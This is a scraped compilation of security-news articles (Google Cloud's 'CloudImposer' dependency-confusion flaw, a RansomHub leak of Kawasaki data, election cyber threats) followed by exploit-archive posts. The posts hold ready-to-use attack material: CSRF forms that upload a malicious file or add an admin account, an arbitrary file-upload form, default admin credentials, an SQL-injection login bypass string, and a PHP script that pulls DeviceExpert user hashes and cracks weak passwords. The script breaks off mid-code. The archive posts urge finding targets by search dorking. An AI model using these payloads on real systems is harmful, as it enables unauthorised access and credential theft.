Attackers could have exploited a dependency confusion vulnerability affecting various Google Cloud services to execute a sprawling supply chain attack via just one malicious Python code package.

Source: Aleksia via Alamy Stock Photo

Google has patched a flaw in its Google Cloud Platform (GCP) that attackers could have exploited to execute a supply chain attack on millions of customer cloud servers, simply by deploying a single malicious code package.

Researchers from Tenable discovered the remote code execution (RCE) vulnerability, dubbed "CloudImposer," that attackers could have used to hijack an internal software dependency affecting GCP services, they revealed in analysis published Sept. 16.

Specifically, the flaw was found in GCP's Cloud Composer service for orchestrating software pipelines, but it also affected the Google services App Engine and Cloud Function. The flaw created a scenario called a dependency confusion, a technique discovered several years ago but widely misunderstood even by cloud platform providers, according to Tenable.

A dependency confusion attack, first discovered by security researcher Alex Birsan in 2021, starts when an attacker creates a malicious software package, gives it the same name as a legitimate internal package, and publishes it to a public repository.

"When a developer's system or build process mistakenly pulls the malicious package instead of the intended internal one, the attacker gains access to the system," Tenable senior security researcher Liv Matan explained in the analysis. "This attack exploits the trust developers place in package management systems and can lead to unauthorized code execution or data breaches."

He added: "There’s a surprising and concerning lack of awareness about it and about how to prevent \[dependency confusion\], even among leading tech vendors like Google. And unfortunately, this type of dependency can be exploited to execute supply chain attacks in the cloud that "are exponentially more harmful than on-premises."

"For example, one malicious package in a cloud service can be deployed to — and harm — millions of users," Matan observed. In essence, then, one single faulty command in GCP could potentially have created a ripple affect across myriad cloud deployments, giving attackers access to customers' enterprise cloud environments.

Tenable's findings were first presented in a session by Matan at Black Hat USA in August called "The GCP Jenga Tower: Hacking Millions of Google's Servers With a Single Package (and More)," — one a Dark Reading expert advised not to miss at the conference. However, he published his full analysis on Tenable's blog only this week.

**Risky Documentation Leads to Flaw**

The first sign of the flaw was Google documentation regarding GCP and the Python Software Foundation that introduced the possibility of dependency confusion in cloud deployments, according to Tenable. The researchers dug further and found that Google itself applied the same risky implementation advice to GCP, introducing the flaw.

Specifically, Google advised users who want to use private Python packages in the GCP services App Engine, Cloud Function and Cloud Composer services to use what's called the "--extra-index-url" argument.

"This argument looks for the public registry (PyPI) in addition to the specified private registry from which the application or user intends to install the private dependency," Matan explained. "This behavior opens the door for attackers to carry out a dependency confusion attack."

The researchers inferred that there are "numerous GCP customers" who followed Google's risky guidance, as well as ultimately discovered that Google itself took its own advice when installing private packages in their own internal services.

Specifically, Tenable researchers found that Google used the risky --extra-index-url argument to install a private code package missing from the public registry in a way "that allows attackers to upload a malicious package to the public registry, and take over the pipeline," Matan wrote.

**Google Fix & Other Mitigations**

The researchers responsibly disclosed both the documentation and the CloudImposer RCE vulnerability to Google, which promptly responded and took action, according to Tenable. Specifically, Google fixed the vulnerable script in Google Cloud Composer that was utilizing the --extra-index-url argument when installing a private package from a private registry.

The company also inspected the checksum of vulnerable package instances and notified Tenable that, as far as Google knows, there is no evidence that the CloudImposer was ever exploited, Matan noted.

Google also acknowledged that while the exploit code that Tenable developed ran in Google's internal servers, it's likely that it would not have run in customers' environments because it wouldn't pass the integration tests.

Further, the company fixed the risky documentation, now recommending that GCP customers use the --index-url argument instead of the --extra-index-url argument, and the tech giant has adopted Tenable's suggestion to recommend that GCP customers use the GCP Artifact Registry's virtual repository to safely control the Python package manager search order, Matan noted.

GCP customers should analyze their environments for their package installation process to prevent breaches, specifically searching for the use of the --extra-index-url argument in Python to ensure they are not vulnerable to a dependency confusion attack.

Matan concluded: "A combination of responsible security practices by both cloud providers and cloud customers can mitigate many risks associated with cloud supply chain attacks."

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

'CloudImposer' Flaw in Google Cloud Affected Millions of Servers

RansomHub ransomware group leaks alleged 487 GB of sensitive data stolen from Kawasaki Motors Europe (KME), following a…

RansomHub ransomware group leaks alleged 487 GB of sensitive data stolen from Kawasaki Motors Europe (KME), following a cyberattack. The breach includes business documents and financial data, raising cybersecurity concerns for global firms.

The notorious RansomHub ransomware group has leaked 487 gigabytes of data it allegedly stole from Kawasaki Motors Europe (KME). This cyberattack was publicly **disclosed** by Kawasaki last week, though the company emphasized that the attack had not been successful in its aims.

As a preventive measure, Kawasaki temporarily isolated its servers and initiated a thorough “cleansing process” to detect any potential infections. However, despite Kawasaki’s recovery efforts, RansomHub went ahead with the data release. On September 5, 2024, the group listed the stolen information on the dark web, utilizing its official dark web leak sites to dump the data.

As seen by the Hackread.com research team, among the exposed files are critical business documents, including financial information, banking records, dealership details, and internal communications.

A partial list of the leaked data includes directories titled “Dealer Lists,” “Financing Kawasaki,” “COVID,” “Trading Terms,” and more, with timestamps showing activity as recent as early September.

Screenshot from the dark web leak site of the RansomHub Ransomware Group (Screenshot credit: Hackread.com)

**Kawasaki’s Response and Cybersecurity Strategy**

While Kawasaki Motors Europe disclosed the breach to its customers, it appears that the company opted not to engage with the ransom demands. **Jason Soroko**, Senior Fellow at Sectigo, speculated that Kawasaki may have prioritized system restoration over paying the ransom.

He suggested that this decision reflects Kawasaki’s readiness to deal with the potential fallout of a data breach, emphasizing the importance of having strong cybersecurity systems in place to avoid financial damage through ransom payments.

_“_Kawasaki Motors Europe’s official statement claimed they could take the hit with the data versus the financial hit of paying the ransom, however, the RansomHub group released 487 GB of allegedly stolen data. This suggests, but does not prove, Kawasaki chose not to negotiate with the attackers, prioritizing system restoration and data cleansing._“_

Soroko added that Kawasaki’s stance might serve as a model for other companies: instead of negotiating with cybercriminals, businesses should focus on recovery and work to fortify their systems against future attacks.

He also pointed out the need for organizations, especially in the United States, to enhance their cybersecurity infrastructure, prepare for such incidents, and collaborate with government authorities to better handle ransomware threats.

_“_Given RansomHub’s increased activity, US companies should bolster cybersecurity measures, prepare robust incident response plans, and avoid paying ransoms, aligning with government advisories. Staying informed about such threats and collaborating with authorities can mitigate risks and protect sensitive data,_“_ he explained.

**The Role of RansomHub**

RansomHub is a notorious player in cybercrime especially ransomware attacks, having made headlines recently for its involvement in other major breaches. Earlier this month, the group claimed responsibility for **hacking Planned Parenthood** and stealing 93 gigabytes of sensitive data.

This trend of increased activity exposes the growing threat posed by ransomware groups, which often target high-profile organizations in sectors ranging from healthcare to manufacturing.

1.  **PythonAnywhere Cloud Platform Abused for Hosting Ransomware**
2.  **Qilin Ransomware Upgrade: Now Steals Google Chrome Credentials**
3.  **Russian Hackers Hit Mail Servers in Europe for Political, Military Intel**
4.  **Xplain Hack: Play Ransomware Leaks Sensitive Swiss Government Data**
5.  **Hackers hit Europe’s largest healthcare provider with Snake ransomware**

RansomHub Ransomware Gang Leaks 487GB of Alleged Kawasaki Europe Data

While the 2024 election may see various cyber threats, existing security measures and coordination across all levels of government aim to minimize their impact.

Mike Kosak, Senior Principal Intelligence Analyst, LastPass

September 16, 2024

4 Min Read

Source: Saphiens via Alamy Stock Photo

COMMENTARY

As the 2024 US presidential election approaches, cybersecurity is a frequent topic of conversation. From my time in the intelligence community supporting the Department of Defense, I'm familiar with government planning around elections. While the most discussed threats for 2024 are nation-state misinformation and disinformation, this election season, I'm also following cybersecurity threats to municipal election systems. 

The good news is the threat of an actual impactful disruption is low. As the US has funneled significant resources into securing elections over the past decade, US Cybersecurity and Infrastructure Security Agency (CISA) lead Jen Easterly said election infrastructure "has never been more secure." However, that doesn't mean threat actors aren't likely to attempt some sort of attacks, such as website defacements or distributed denial of service (DDoS) attacks against municipal election websites.

Here are the four threats against local election systems we will most likely hear about in 2024:

**Voting Machine Hacking**

The most high-profile threat to US elections is voting machine hacking. However, voting machines are rarely connected directly to the Internet, which aligns with current cybersecurity guidelines. This means the most realistic threat vector would require physical access to the machines, according to F5 Labs, a concern addressed through anti-tampering and physical security guidelines around the country. While cyber vulnerabilities within voting machines exist — as demonstrated annually at the DEFCON Voting Village hacking event — to date, there have been no reports of cyberattacks taking voting machines offline or changing votes, despite the clear value of such a capability to US adversaries.

**DDoS Attacks**

DDoS attacks are a less disruptive but more frequent threat to US elections. Election monitoring and information websites leveraging Google's Project Shield DDoS protection services experienced a 400% increase in weekly attacks during the 2022 midterms. While several companies like Cloudflare offer free DDoS protection services to election-related websites, some sites are still going down. Mississippi's election websites were briefly taken offline in 2022 by a DDoS attack claimed by a pro-Russia hacking group. However, the attack did not impact voting results or availability.

Given the increased profile of the presidential election, we can expect to see DDoS on a larger scale in 2024. However, as CISA and the FBI stated in a July 31 alert, these attacks would not prevent voters from casting their ballots.

**Ransomware**

The FBI and CISA released a similar alert on Aug. 15 related to ransomware disruptions, reassuring the public that any attack along these lines would not compromise the security or accuracy of voting. Ransomware groups will likely target municipalities — already a common target — in the run-up to the elections. 

For instance, a ransomware attack in April forced a Georgia county to temporarily disconnect from the state's voter registration system as a precautionary measure — highlighting disruptions that could occur around access to voter data or other election information. However, the FBI and CISA noted, "Any successful ransomware attack on election infrastructure tracked by FBI and CISA has remained localized and successfully managed with minimal disruption to election operations and no impact on the security and accuracy of ballot casting or tabulation processes or systems." Similar to DDoS attacks, no reporting suggests ransomware attacks have ever prevented a vote from being cast.

**Website Defacement and Email Access**

Website defacements are another common threat, where attackers take over election-related sites to alter data or images. These attacks can either aim to embarrass the site owner or subtly manipulate information, such as polling results or polling station hours.

In 2020, a threat actor briefly took over the campaign website for then President Trump, posting a derogatory message and seeking payment in return for not releasing data they claimed to have stolen. While these attacks may occur and could cause local disruptions, they would not impact the ability to vote or tally votes.

Hybrid cyber-physical threats, such as the increasing use of emails or spoofed phone numbers to deliver fake bomb threats or conduct swatting attacks, also present a concern, where false scenarios are reported to provoke a large police response. In 2018, a months-long campaign targeting US schools and businesses caused evacuations, police responses, and major disruptions. Similar attacks on election day could target polling stations, election offices, or ballot-counting sites.

Finally, threat actors (particularly nation-states) will continue to target email accounts of political operatives and organizations. The US intelligence community has already attributed social engineering attacks targeting both major US political parties to Iran. These attacks aimed to access sensitive or embarrassing information to influence the US election, highlighting the frequency of politically motivated social engineering attacks and the importance of secure, unique passwords and multifactor authentication. 

**Safeguarding the Vote**

While cyberattacks will undoubtedly target US election infrastructure over the next few months, it's important to place these events in the context of the protections put in place. Federal, state, local, and tribal governments, as well as international allies, have all been tracking these threats and implementing mitigations and contingencies to help ensure a secure and smooth election. 

While the 2024 election may see various cyber threats, existing security measures and coordination across all levels of government aim to minimize their impact. Voters should stay informed and rely on official sources to ensure their participation is not disrupted.

**About the Author**

Senior Principal Intelligence Analyst, LastPass

Mike Kosak is a former US Department of Defense (DoD) counterterrorism intelligence officer with more than 20 years of experience as a threat intelligence analyst. While with the DoD, he served in several senior intelligence officer roles, including leading the Pentagon office responsible for providing intelligence updates to the chairman of the Joint Chiefs of Staff, and was deployed to Iraq three times in support of Operation Iraqi Freedom. He also served as the acting senior command representative to the Joint Special Operations Command for the Defense Intelligence Agency. During his deployments, he led intelligence teams in support of both conventional and special forces. Following his government service, Kosak held private sector cyber intelligence positions at Bank of America, where he led the Strategic Cyber Intelligence and Threat Evaluation teams, and TIAA, where he led the Cyber Threat Intelligence team. He currently serves as the senior principal intelligence analyst at LastPass.

Cybersecurity &amp; the 2024 US Elections

A now-patched critical security flaw impacting Google Cloud Platform (GCP) Composer could have been exploited to achieve remote code execution on cloud servers by means of a supply chain attack technique called dependency confusion.
The vulnerability has been codenamed CloudImposer by Tenable Research.
"The vulnerability could have allowed an attacker to hijack an internal software dependency

Cloud Security / Vulnerability

A now-patched critical security flaw impacting Google Cloud Platform (GCP) Composer could have been exploited to achieve remote code execution on cloud servers by means of a supply chain attack technique called dependency confusion.

The vulnerability has been codenamed **CloudImposer** by Tenable Research.

"The vulnerability could have allowed an attacker to hijack an internal software dependency that Google pre-installs on each Google Cloud Composer pipeline-orchestration tool," security researcher Liv Matan said in a report shared with The Hacker News.

Dependency confusion (aka substitution attack), which was first documented by security researcher Alex Birsan in February 2021, refers to a type of software supply chain compromise in which a package manager is tricked into pulling a malicious package from a public repository instead of the intended file of the same name from an internal repository.

So, a threat actor could stage a large-scale supply chain attack by publishing a counterfeit package to a public package repository with the same name as a package internally developed by companies and with a higher version number.

This, in turn, causes the package manager to unknowingly download the malicious package from the public repository instead of the private repository, effectively replacing the existing package dependency with its rogue counterpart.

The problem identified by Tenable is similar in that it could be abused to upload a malicious package to the Python Package Index (PyPI) repository with the name "google-cloud-datacatalog-lineage-producer-client," which could then be preinstalled on all Composer instances with elevated permissions.

While Cloud Composer requires that the package in question is version-pinned (i.e., version 0.1.0), Tenable found that using the "--extra-index-url" argument during a "pip install" command prioritizes fetching the package from the public registry, thereby opening the door to dependency confusion.

Armed with this privilege, attackers could execute code, exfiltrate service account credentials, and move laterally in the victim's environment to other GCP services.

Following responsible disclosure on January 18, 2024, it was fixed by Google in May 2024 by ensuring that the package is only installed from a private repository. It has also added the extra precaution of verifying the package's checksum in order to confirm its integrity and validate that it has not been tampered with.

The Python Packaging Authority (PyPA) is said to have been aware of the risks posed by the "--extra-index-url" argument since at least March 2018, urging users to skip using PyPI in cases where the internal package needs to be pulled.

"Packages are expected to be unique up to name and version, so two wheels with the same package name and version are treated as indistinguishable by pip," a PyPA member noted at the time. "This is a deliberate feature of the package metadata, and not likely to change."

Google, as part of its fix, now also recommends that developers use the "--index-url" argument instead of the "–extra-index-url" argument and that GCP customers make use of an Artifact Registry virtual repository when requiring multiple repositories.

"The '--index-url' argument reduces the risk of dependency confusion attacks by only searching for packages in the registry that was defined as a given value for that argument," Matan said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Fixes GCP Composer Flaw That Could've Led to Remote Code Execution

Reservation Management System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Reservation Management System 1.0 CSRF Vulnerability                                                                        |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/reservation.zip                                       |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

  [+] Line 8 : Set your target url

[+] save payload as poc.html 

[+] payload : 

<div class="modal-content">  
            <div class="modal-header">  
              <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>  
              <h4 class="modal-title">Add New Menu</h4>  
            </div>  
            <div class="modal-body">  
                
              <form class="form-horizontal" method="post" action="http://127.0.0.1/reservation/admin/menu_save.php" enctype="multipart/form-data">  
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Menu Name</label>  
                      <div class="col-lg-8">   
                        <input type="text" class="form-control" name="menu" id="title" placeholder="Menu Name" required="">  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Category</label>  
                      <div class="col-lg-8">   
                        <select class="form-control select2" id="exampleSelect1" name="cat" required="">  
                                                         <option value="9">Dessert</option>  
                                                        <option value="6">Main Course</option>  
                                                        <option value="7">Pasta</option>  
                                                        <option value="10">Rice</option>  
                                                </select>  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Subcategory</label>  
                      <div class="col-lg-8">   
                        <select class="form-control select2" id="exampleSelect1" name="subcat">  
                                                         <option>Drinks</option>  
                                                        <option>Lunch and Dinner</option>  
                                                        <option>Mirienda</option>  
                                                        <option>Non Combo Meal</option>  
                                                </select>  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Description</label>  
                      <div class="col-lg-8">   
                        <textarea class="form-control" name="desc" id="title" placeholder="Description" required=""></textarea>  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Price</label>  
                      <div class="col-lg-8">   
                        <input type="text" class="form-control" name="price" id="title" placeholder="Price" required="">  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Image</label>  
                      <div class="col-lg-8">   
                        <input type="file" class="form-control" name="image" id="title">  
                      </div>  
                  </div> 

                    
                  <div class="form-group">  
                        
                      <div class="col-lg-offset-2 col-lg-6">  
                        <button type="submit" class="btn btn-sm btn-primary">Save</button>  
                        <button type="button" class="btn btn-default" data-dismiss="modal" aria-hidden="true">Close</button>  
                       </div>  
                  </div>  
              </form>  
                
            </div>

                    </div>

    [+] Ev!L : http://127.0.0.1/reservation/images/shopping.php

-----------[+] Part 02 Add Admin [+]-------------------

[+] Line 8 : Set your target url

[+] save payload as poc.html 

[+] payload : 

<div class="modal-content">  
            <div class="modal-header">  
              <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>  
              <h4 class="modal-title">Add New User</h4>  
            </div>  
            <div class="modal-body">  
                
              <form class="form-horizontal" method="post" action="http://127.0.0.1/reservation/admin/user_save.php">  
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Full Name</label>  
                      <div class="col-lg-8">   
                        <input type="text" class="form-control" name="name" id="title" placeholder="Write Full Name of User" required="">  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="username">Username</label>  
                      <div class="col-lg-8">   
                        <input type="text" class="form-control" name="username" value="chimney_admin" placeholder="Write Username" required="">  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="password">Password</label>  
                      <div class="col-lg-8">   
                        <input type="password" class="form-control" name="password" id="password" placeholder="Write password" required="">  
                      </div>  
                  </div> 

                                                                        
                  <div class="form-group">  
                        
                      <div class="col-lg-offset-2 col-lg-6">  
                        <button type="submit" class="btn btn-sm btn-primary">Save</button>  
                        <button type="button" class="btn btn-default" data-dismiss="modal" aria-hidden="true">Close</button>  
                       </div>  
                  </div>  
              </form>  
                
            </div>

                    </div>  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Reservation Management System 1.0 Cross Site Request Forgery

Online Job Recruitment Portal Project version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================  
| # Title     : Online Job Recruitment Portal project v1.0 Remote File Upload Vulnerability                                                 |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |  
| # Vendor    : https://www.kashipara.com/project/php/12866/online-job-recruitment-portal-php-project-source-code                           |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

[+] Go to the line 10.

[+] Set the target site link Save changes and apply . 

[+] infected file : rec_detail.php.

[+] save code as poc.html .

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Recruitment Form</title>  
</head>  
<body>  
    <h1>Recruitment Form</h1>  
    <form action="http://127.0.0.1/Recruitment-Portal-master/rec_detail.php" method="POST" enctype="multipart/form-data">  
          
        <label for="photograph">Photograph:</label>  
        <input type="file" id="photograph" name="photograph" required><br><br>

          
        <label for="placeofbirth">Place of Birth:</label>  
        <input type="text" id="placeofbirth" name="placeofbirth" required><br><br>

          
        <label for="fhname">Father's/Husband's Name:</label>  
        <input type="text" id="fhname" name="fhname" required><br><br>

          
        <label for="marital_status">Marital Status:</label>  
        <select id="marital_status" name="marital_status">  
            <option value="single">Single</option>  
            <option value="married">Married</option>  
            <option value="divorced">Divorced</option>  
        </select><br><br>

          
        <label for="Nationality">Nationality:</label>  
        <select id="Nationality" name="Nationality">  
            <option value="national1">Nationality 1</option>  
            <option value="national2">Nationality 2</option>  
        </select><br><br>

          
        <label for="handicapped">Handicapped:</label>  
        <select id="handicapped" name="handicapped">  
            <option value="yes">Yes</option>  
            <option value="no">No</option>  
        </select><br><br>

          
        <label for="religion">Religion:</label>  
        <select id="religion" name="religion">  
            <option value="religion1">Religion 1</option>  
            <option value="religion2">Religion 2</option>  
        </select><br><br>

          
        <label for="blood">Blood Group:</label>  
        <select id="blood" name="blood">  
            <option value="A+">A+</option>  
            <option value="B+">B+</option>  
            <option value="AB+">AB+</option>  
            <option value="O+">O+</option>  
            <option value="O-">O-</option>  
        </select><br><br>

          
        <label for="mark">Identification Mark:</label>  
        <input type="text" id="mark" name="mark" required><br><br>

          
        <input type="submit" value="Submit">  
    </form>  
</body>  
</html>

[+] http://127.0.0.1/Recruitment-Portal-master/images/.php

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Online Job Recruitment Portal Project 1.0 Arbitrary File Upload

IFSC Code Finder Portal version 1.0 suffers from an ignored default credential vulnerability.

**IFSC Code Finder Portal 1.0 Insecure Settings**

Posted Sep 16, 2024

Authored by indoushka

IFSC Code Finder Portal version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 4c8714f261d6bcdc7f5ee89b4f1473342ced816a03f174b9a8bc607a329616e0

Download | Favorite | View

**IFSC Code Finder Portal 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : IFSC Code Finder Portal v1.0 Insecure Settings Vulnerability                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/ifsc-code-finder-project-using-php/                                                                  |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = Test@123[+] http://127.0.0.1/ifscfinder/admin/login.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,759)
*   Arbitrary (17,063)
*   BBS (2,859)
*   Bypass (1,915)
*   CGI (1,047)
*   Code Execution (7,895)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,423)
*   DoS (25,236)
*   Encryption (2,394)
*   Exploit (54,214)
*   File Inclusion (4,273)
*   File Upload (1,012)
*   Firewall (822)
*   Info Disclosure (2,913)
*   Intrusion Detection (918)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,272)
*   Local (14,848)
*   Magazine (587)
*   Overflow (13,212)
*   Perl (1,435)
*   PHP (5,262)
*   Proof of Concept (2,409)
*   Protocol (3,749)
*   Python (1,656)
*   Remote (31,860)
*   Root (3,671)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,046)
*   Shell (3,303)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,716)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (673)
*   Vulnerability (33,064)
*   Web (10,136)
*   Whitepaper (3,784)
*   x86 (970)
*   XSS (18,290)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,120)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,142)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,780)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,828)
*   UNIX (9,454)
*   UnixWare (188)
*   Windows (6,766)
*   Other

IFSC Code Finder Portal 1.0 Insecure Settings

GYM Management System version 1.0 suffers from an ignored default credential vulnerability.

**GYM Management System 1.0 Insecure Settings**

Posted Sep 16, 2024

Authored by indoushka

GYM Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 5ee11f413d4f6dbbb71c2d782424145f8284d96790518d7c0e3923c5bd409844

Download | Favorite | View

**GYM Management System 1.0 Insecure Settings**

    ====================================================================================================================================| # Title     : GYM Management System 1.0 Insecure Settings Vulnerability                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/gym-management-system-using-php-and-mysql/                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin@gmail.com      Password: Test@123[+] http://127.0.0.1/agms/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,759)
*   Arbitrary (17,063)
*   BBS (2,859)
*   Bypass (1,915)
*   CGI (1,047)
*   Code Execution (7,895)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,423)
*   DoS (25,236)
*   Encryption (2,394)
*   Exploit (54,214)
*   File Inclusion (4,273)
*   File Upload (1,012)
*   Firewall (822)
*   Info Disclosure (2,913)
*   Intrusion Detection (918)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,272)
*   Local (14,848)
*   Magazine (587)
*   Overflow (13,212)
*   Perl (1,435)
*   PHP (5,262)
*   Proof of Concept (2,409)
*   Protocol (3,749)
*   Python (1,656)
*   Remote (31,860)
*   Root (3,671)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,046)
*   Shell (3,303)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,716)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (673)
*   Vulnerability (33,064)
*   Web (10,136)
*   Whitepaper (3,784)
*   x86 (970)
*   XSS (18,290)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,120)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,142)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,780)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,828)
*   UNIX (9,454)
*   UnixWare (188)
*   Windows (6,766)
*   Other

GYM Management System 1.0 Insecure Settings

Emergency Ambulance Hiring Portal version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Emergency Ambulance Hiring Portal 1.0 Auth By Pass Vulnerability                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/emergency-ambulance-hiring-portal-using-php-and-mysql/                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : USer & PASs : ' or 0=0 ##[+] http://127.0.0.1/eahp/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Emergency Ambulance Hiring Portal 1.0 SQL Injection

ManageEngine DeviceExpert version 5.9.7 build 5970 allows for usernames and salted MD5 password hashes to be disclosed.

    ====================================================================================================================================| # Title     : DeviceExpert v 5.9.7 build 5970 PHP extracts Credentials Vulnerability                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://manageengine.com/                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This PHP COde extracts usernames and salted MD5 password hashes from ManageEngine DeviceExpert version 5.9 build 5980 and prior.[+] LIne 87 set your targer .    [+] usage : C:\www\test>php 3.php[+] Payload :<?phpclass ManageEngineDeviceExpert {    private $host;    private $port;    private $ssl;    public function __construct($host, $port = 6060, $ssl = true) {        $this->host = $host;        $this->port = $port;        $this->ssl = $ssl;    }    private function sendRequest($path) {        $url = ($this->ssl ? 'https://' : 'http://') . $this->host . ':' . $this->port . $path;        $ch = curl_init($url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        $response = curl_exec($ch);        curl_close($ch);        return $response;    }    public function getUsers() {        echo "Reading users from master...\n";        $response = $this->sendRequest('/ReadUsersFromMasterServlet');        if (!$response) {            echo "Connection failed\n";            return null;        }        if (strpos($response, '<discoverydata>') !== false) {            preg_match_all('/<discoverydata>(.*?)<\/discoverydata>/', $response, $matches);            echo "Found " . count($matches[0]) . " users\n";            return $matches[0];        } else {            echo "Could not find any users\n";            return null;        }    }    public function parseUserData($user) {        if (!$user) return null;        preg_match('/<username>([^<]+)<\/username>/', $user, $username);        preg_match('/<password>([^<]+)<\/password>/', $user, $encoded_hash);        preg_match('/<userrole>([^<]+)<\/userrole>/', $user, $role);        preg_match('/<emailid>([^<]+)<\/emailid>/', $user, $email);        preg_match('/<saltvalue>([^<]+)<\/saltvalue>/', $user, $salt);        $hash = base64_decode($encoded_hash[1]);        $password = null;        $weak_passwords = ['12345', 'admin', 'password', $username[1]];        foreach ($weak_passwords as $weak_password) {            if (md5($weak_password . $salt[1]) == bin2hex($hash)) {                $password = $weak_password;                break;            }        }        return [            'username' => $username[1],            'password' => $password,            'hash' => bin2hex($hash),            'role' => $role[1],            